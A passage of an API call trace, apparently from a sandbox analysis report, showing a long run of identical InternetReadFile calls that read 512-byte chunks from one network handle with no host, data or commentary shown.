	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.572] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
